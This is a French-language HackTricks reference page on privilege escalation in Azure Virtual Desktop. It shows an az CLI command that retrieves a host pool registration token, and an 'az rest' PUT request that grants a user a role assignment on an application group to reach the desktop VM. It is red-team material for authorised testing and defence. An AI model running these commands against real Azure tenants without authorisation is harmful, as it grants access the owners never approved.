Az - Virtual Desktop Privesx

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Azure Virtual Desktop Privesc

Pour plus d’informations sur Azure Virtual Desktop, consultez :

Az - Virtual Desktop

Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action

Vous pouvez rĂ©cupĂ©rer le jeton d’enregistrement utilisĂ© pour enregistrer des machines virtuelles au sein d’un pool d’hĂŽtes.

az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1

Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write

Warning

Un attaquant avec ces permissions pourrait faire des choses beaucoup plus dangereuses que celle-ci.

Avec ces permissions, vous pouvez ajouter une attribution d’utilisateur au groupe d’application, ce qui est nĂ©cessaire pour accĂ©der Ă  la machine virtuelle du bureau virtuel :

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
--body '{
"properties": {
"roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
"principalId": "<USER_OBJECT_ID>"
}
}'

Notez que pour qu’un utilisateur puisse accĂ©der Ă  un Bureau ou Ă  une application, il doit Ă©galement avoir le rĂŽle Virtual Machine User Login ou Virtual Machine Administrator Login sur la VM.

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks